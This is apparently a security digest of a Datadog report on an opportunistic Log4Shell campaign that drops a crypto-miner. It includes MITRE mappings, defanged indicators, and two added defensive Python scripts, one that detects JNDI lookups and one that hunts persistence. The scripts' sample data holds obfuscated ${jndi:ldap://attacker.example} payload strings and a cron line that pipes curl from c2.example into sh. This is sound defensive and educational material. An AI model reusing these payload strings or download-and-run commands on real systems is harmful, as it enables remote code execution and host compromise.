The Endless Gift: A New Opportunistic Log4j Campaign | Datadog Security Labs

Two years after the disclosure of the Log4j vulnerability known as Log4Shell, opportunistic campaigns continue to exploit it for crypto-mining and system compromise. This one delivers obfuscated JNDI lookup strings that point to an attacker-controlled LDAP server, which in turn serves the scripts that establish persistence, perform reconnaissance, and exfiltrate data. This report highlights how backdoors and encrypted channels support ongoing post-exploitation activity. #Log4Shell #APT41

Keypoints

  • Log4Shell (CVE-2021-44228) carries a CVSS v3.1 base score of 10.0 (Critical), the highest possible.
  • Threat actors ranging from nation-state groups to financially motivated criminals have exploited Log4j vulnerabilities.
  • Recent campaigns, including this one, use Log4Shell to deploy the XMRig cryptocurrency miner.
  • The exploit string is an obfuscated JNDI lookup that resolves to an attacker-controlled LDAP server, so signatures that only match the literal ${jndi:ldap:// prefix miss it.
  • The downloaded scripts establish persistence (systemd services or cron jobs) and maintain control through backdoors.
  • Collected data is exfiltrated via HTTP POST requests to remote servers after host reconnaissance, and some of the traffic uses channels that appear to be encrypted.
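The obfuscation mentioned above is the reason naive signatures miss these requests: Log4j 2 resolves nested lookups such as ${lower:j} or ${env:UNSET:-j} to plain characters before the outer ${jndi:...} lookup runs, so the literal ${jndi:ldap:// string never appears in the raw request. The following Python is an added example for this digest, not Datadog's tooling: it undoes URL-encoding and those nested lookups, then flags the JNDI lookup and its scheme over a handful of constructed access-log lines. The hosts (attacker.example) and paths in the samples are invented.

```python
"""Normalise obfuscated Log4Shell (CVE-2021-44228) lookup strings and flag
them in log lines. Added example for this digest; not Datadog's code."""
import re
import urllib.parse
from typing import Iterable, List, Optional, Tuple

# Innermost lookups that Log4j 2 resolves to a literal before the outer
# ${jndi:...} is evaluated:
#   ${lower:J} -> "j"      ${upper:l} -> "L"
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
#   ${env:UNSET_NAME:-j} -> "j"   ${::-j} -> "j"   (undefined lookup, default value)
# The lookahead keeps a real jndi prefix intact even if its URL contains ":-".
_DEFAULT = re.compile(r"\$\{(?!jndi:)[^${}]*?:-([^${}]*)\}", re.IGNORECASE)
# What we are looking for once the noise is gone; group 1 is the JNDI
# scheme (ldap, ldaps, rmi, dns, iiop, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _case_fold(m) -> str:
    op, text = m.group(1).lower(), m.group(2)
    return text.lower() if op == "lower" else text.upper()


def normalize(raw: str, max_rounds: int = 32) -> str:
    """Undo (double) URL-encoding, then collapse nested lookups innermost-first.

    The round limit bounds the work a hostile input can make us do.
    """
    s = raw
    for _ in range(2):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(max_rounds):
        before = s
        s = _CASE.sub(_case_fold, s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
        if s == before:
            break
    return s


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """(scheme, normalised line) if the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    return None if m is None else (m.group(1).lower(), norm)


def scan(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Index and JNDI scheme of every line that carries a lookup."""
    hits = []
    for i, line in enumerate(lines):
        found = find_jndi(line)
        if found:
            hits.append((i, found[0]))
    return hits


# Constructed access-log lines, not real traffic: hosts use the reserved
# .example TLD and the paths are invented. Index 4 is benign.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example:1389/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}${::-n}di:${upper:r}mi://attacker.example:1099/b}"',
    '10.0.0.8 - - "GET /%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%3A1389%2Fc%7D HTTP/1.1" 404 "-" "curl/8.0"',
    '10.0.0.9 - - "GET /?price=${amount} HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "-" "${j${k8s:k5:-ND}i:${sys:x:-l}dap://attacker.example:1389/d}"',
]

if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LOG):
        print(f"line {idx}: jndi scheme={scheme}")
        print("   normalised:", find_jndi(SAMPLE_LOG[idx])[1])
```

This is a log-side heuristic for hunting and alerting: it catches the nested-lookup and URL-encoding tricks that defeat a literal-prefix signature, but it does not replace upgrading Log4j (2.17.1 or later for the 2.x line) or removing the JndiLookup class from affected deployments.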

MITRE Techniques

  • [T1190] Initial Access – Exploit Public-Facing Application: exploitation of the Log4j vulnerability in an internet-exposed service to execute remote code. “The attack payload is a conventional exploit targeting the Log4j vulnerability, with slight obfuscation to evade detection.”
  • [T1543.002] Persistence – Create or Modify System Process: Systemd Service, together with [T1053.003] Scheduled Task/Job: Cron. “Setting up systemd services or cron jobs for persistent execution.”
  • [T1041] Exfiltration – Exfiltration Over C2 Channel. “Exfiltrating data via HTTP POST requests to remote servers.”
  • [T1070.003] Defense Evasion – Indicator Removal: Clear Command History, together with [T1070.004] File Deletion. “Clearing bash history and removing malicious scripts to evade detection.”
  • [T1082] Discovery – System Information Discovery, together with [T1033] System Owner/User Discovery. “Collecting user information and system details for further exploitation.”
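To turn the persistence entry above (and the matching key point about systemd services and cron jobs) into a host check, the following Python is an added example for this digest rather than Datadog's code. It extracts the command from each entry of a user or system crontab and from the [Service] section of systemd unit files, then scores each command against the file IOCs listed on this page, world-writable directories, and download-and-execute pipelines. The crontab and unit files it scans are constructed samples, and the c2.example host is invented.

```python
"""Hunt for the cron and systemd persistence this campaign sets up.
Added example for this digest, not Datadog's tooling. The crontab and unit
files below are constructed samples, not captured from a real host."""
import re
from typing import Iterable, List, NamedTuple, Tuple

SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
KNOWN_BAD_PATHS = ("/tmp/lte", "/bin/componist")   # file IOCs from this digest
# Download-and-run pipelines such as "curl -s http://x/y | sh".
_PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba|da|z)?sh\b")


class Finding(NamedTuple):
    source: str                 # "cron:<table>" or "systemd:<unit>"
    command: str
    reasons: Tuple[str, ...]


def judge(command: str) -> Tuple[str, ...]:
    """Why a persistent command looks malicious; an empty tuple means clean."""
    reasons = []
    if any(p in command for p in KNOWN_BAD_PATHS):
        reasons.append("known IOC path")
    if any(d in command for d in SUSPICIOUS_DIRS):
        reasons.append("runs from a world-writable directory")
    if _PIPE_TO_SHELL.search(command):
        reasons.append("downloads and pipes to a shell")
    return tuple(reasons)


def cron_commands(text: str, system_table: bool = False) -> List[str]:
    """Command part of each crontab entry. system_table=True handles
    /etc/crontab and /etc/cron.d/*, which carry a user column before the command."""
    schedule = r"(?:@\w+\s+|(?:\S+\s+){5})"           # @reboot or five time fields
    user = r"(?:\S+\s+)" if system_table else ""
    entry = re.compile(r"^\s*" + schedule + user + r"(?P<cmd>\S.*)$")
    commands = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if re.match(r"^\s*[A-Za-z_]\w*=", line):     # PATH=, SHELL=, MAILTO=
            continue
        m = entry.match(line)
        if m:
            commands.append(m.group("cmd").strip())
    return commands


def systemd_exec_commands(unit_text: str) -> List[str]:
    """ExecStart/ExecStartPre/ExecStartPost values from [Service], prefixes stripped."""
    commands = []
    in_service = False
    for line in unit_text.splitlines():
        s = line.strip()
        if s.startswith("["):
            in_service = s.lower() == "[service]"
            continue
        if in_service and re.match(r"ExecStart(?:Pre|Post)?=", s):
            value = s.split("=", 1)[1].strip().lstrip("-@+!:")   # systemd prefixes
            if value:
                commands.append(value)
    return commands


def hunt(crontabs: Iterable[Tuple[str, str]],
         units: Iterable[Tuple[str, str]]) -> List[Finding]:
    """Score every persistent command from the given (name, text) pairs."""
    findings = []
    for name, text in crontabs:
        for cmd in cron_commands(text):
            reasons = judge(cmd)
            if reasons:
                findings.append(Finding("cron:" + name, cmd, reasons))
    for name, text in units:
        for cmd in systemd_exec_commands(text):
            reasons = judge(cmd)
            if reasons:
                findings.append(Finding("systemd:" + name, cmd, reasons))
    return findings


# Constructed samples: one user crontab and two unit files (only ssh.service is benign).
SAMPLE_CRONTAB = """\
# constructed user crontab
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /tmp/lte
*/10 * * * * curl -s http://c2.example/u | sh
"""
SAMPLE_UNITS = [
    ("componist.service", "[Unit]\nDescription=componist\n[Service]\n"
                          "ExecStart=/bin/componist\nRestart=always\n"
                          "[Install]\nWantedBy=multi-user.target\n"),
    ("ssh.service", "[Unit]\nDescription=OpenBSD Secure Shell server\n[Service]\n"
                    "ExecStartPre=/usr/sbin/sshd -t\nExecStart=/usr/sbin/sshd -D\n"
                    "[Install]\nWantedBy=multi-user.target\n"),
]

if __name__ == "__main__":
    for f in hunt([("user", SAMPLE_CRONTAB)], SAMPLE_UNITS):
        print(f"{f.source}: {f.command}  <- {', '.join(f.reasons)}")
```

On a live host you would feed it the output of crontab -l for each user, the files under /etc/cron.d and /var/spool/cron, and the unit files under /etc/systemd/system and /usr/lib/systemd/system; because the page reports that the scripts also clear bash history, the cron and unit files are often the more durable evidence.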

Indicators of Compromise

  • [IP] context – 185.220.101[.]34, 185.159.82[.]103:8000 (serves xExportObject.class)
  • [Domain] context – superr[.]buzz (LDAP callback host), nfdo[.]shop (hosts the lte and componist payloads), cmpnst[.]info, rirosh[.]shop
  • [URL] context – ldap://44-211-80-168-i80.superr[.]buzz:1389/rmr, http://185.159.82[.]103:8000/xExportObject.class, http://nfdo[.]shop/lte, http://nfdo[.]shop/componist
  • [Hash] SHA-256 – 5441be217e98051c284d584e830f9a7fc2153143fafee0dc9f6af197cec6c8c9, 2ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f (63 hex characters as published, one short of a full SHA-256; match on the other two hashes or look this one up by prefix), 4f11db82193aebe710585b2faefd2b904b6fe6636f7dc25541cea0dd31adada4
  • [File] context – /tmp/lte, /bin/componist

Read more: https://securitylabs.datadoghq.com/articles/the-gift-that-keeps-on-giving-a-new-opportunistic-log4j-campaign/